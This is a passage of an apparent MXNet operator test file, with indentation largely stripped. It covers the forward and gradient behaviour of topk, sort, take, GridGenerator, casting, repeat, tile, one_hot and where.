ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
                                                     is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
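# Illustrative sketch (not part of the original test suite): gt_topk above builds
# its ground truth from argsort; for a 1-D array the indices of the k largest
# entries are the last k positions of argsort, read in reverse order.
def _topk_indices_sketch(k=2):
    dat = np.array([3.0, 1.0, 4.0, 1.5], dtype=np.float32)
    idx = np.take(dat.argsort(), np.arange(-1, -k - 1, -1), mode='wrap')
    return idx  # -> [2, 0], the positions of 4.0 and 3.0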
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_context(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
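# Illustrative sketch (not part of the original test suite): grad_helper above
# accumulates an all-ones output gradient back into the input array; for a 1-D
# input this is a scatter-add of ones at the taken indices, which np.add.at
# expresses directly (repeated indices accumulate).
def _take_backward_sketch():
    grad_in = np.zeros(4, dtype=np.float32)
    idx = np.array([0, 2, 2])
    np.add.at(grad_in, idx, 1.0)
    return grad_in  # -> [1., 0., 2., 0.]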
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
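# Illustrative sketch (not part of the original test suite): with
# transform_type='affine', GridGenerator multiplies the 2x3 affine matrix by
# homogeneous target coordinates normalized to [-1, 1] (the rows of `tmp` above),
# so the identity matrix reproduces the normalized meshgrid itself.
def _affine_grid_sketch(h=2, w=3):
    xs = -1.0 + (np.arange(h * w) % w) * (2.0 / (w - 1))   # normalized x coordinates
    ys = -1.0 + (np.arange(h * w) // w) * (2.0 / (h - 1))  # normalized y coordinates
    coords = np.stack([xs, ys, np.ones(h * w)])            # homogeneous coordinates, shape (3, h*w)
    identity = np.array([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]])
    return identity.dot(coords)                            # shape (2, h*w), equal to [xs, ys]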
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
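# Illustrative sketch (not part of the original test suite): the generator above
# probes values half-way between adjacent float16 mantissas, where IEEE
# round-to-nearest-even decides the result. For example 1 + 1.5/1024 lies exactly
# between the float16 neighbours 1 + 1/1024 and 1 + 2/1024 and rounds to the one
# with the even mantissa (on numpy >= 1.17, per the note in the test below).
def _fp16_round_to_even_sketch():
    midpoint = np.float32(1.0 + 1.5 / 2 ** 10)  # exactly representable in float32
    return np.float16(midpoint)                 # -> 1 + 2/1024 = 1.001953125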
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
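# Illustrative sketch (not part of the original test suite): the expected gradient
# in test_repeat_backward sums, for each input element, the output gradients of
# its `repeats` copies; along axis 0 this is a reshape followed by a sum.
def _repeat_backward_sketch(repeats=2):
    out_grad = np.arange(8, dtype=np.float32).reshape(4, 2)  # gradient of the repeated output
    return out_grad.reshape(2, repeats, 2).sum(axis=1)       # -> [[2., 4.], [10., 12.]]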
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
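# Illustrative sketch (not part of the original test suite): test_tile_backward sums
# the output gradient over every tiled copy of each input element; the copies of
# a[i, j] sit at the strided positions out[i::n1, j::n2].
def _tile_backward_sketch():
    n1, n2, reps = 2, 3, (2, 2)
    out_grad = np.ones((n1 * reps[0], n2 * reps[1]), dtype=np.float32)
    expected = np.zeros((n1, n2), dtype=np.float32)
    for i in range(n1):
        for j in range(n2):
            expected[i, j] = out_grad[i::n1, j::n2].sum()
    return expected  # every entry equals reps[0] * reps[1] = 4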
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
        grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int64)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
